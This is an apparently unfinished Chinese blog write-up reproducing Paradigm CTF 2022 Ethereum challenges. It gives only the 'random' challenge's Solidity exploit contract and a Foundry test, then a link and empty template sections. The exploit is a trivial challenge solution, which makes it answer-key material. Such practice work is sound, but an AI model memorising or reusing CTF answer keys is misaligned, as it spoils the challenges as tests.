前言
旨在复现,比赛环境没了,只能自己搭建环境,尽可能还原比赛场景。
0x00-random
1.request
将Random合约中的solved修改为true。
2. analysis
签到题,没啥说的。
3. solve
攻击合约:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
| // SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.15;
import "../../../src/Paradigm_CTF_2022/random/Setup.sol";
contract RandomExploit {
Setup setup;
Random random;
constructor(address _setup) {
setup = Setup(_setup);
random = setup.random();
}
function pwn() public {
random.solve(4);
require(setup.isSolved(), "!solved");
}
}
|
测试:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
| // SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.15;
import "./RandomExploit.sol";
import "forge-std/Test.sol";
contract TestRandomExploit is Test {
Setup setup;
RandomExploit exploit;
function setUp() public {
setup = new Setup();
exploit = new RandomExploit(address(setup));
}
function test_isSovled() public {
exploit.pwn();
assertEq(setup.isSolved(), true);
}
}
|
结果:
0x01-rescue
1.request
https://blog.cyberight.capital/paradigm-ctf-2022-solution-writeup-46e8188e3726
2. analysis
3. solve
攻击合约:
结果:
0x0
1.request
2. analysis
3. solve
攻击合约:
结果:
0x0
1.request
2. analysis
3. solve
攻击合约:
结果:
0x0
1.request
2. analysis
3. solve
攻击合约:
结果:
0x0
1.request
2. analysis
3. solve
攻击合约:
结果:
0x0
1.request
2. analysis
3. solve
攻击合约:
结果:
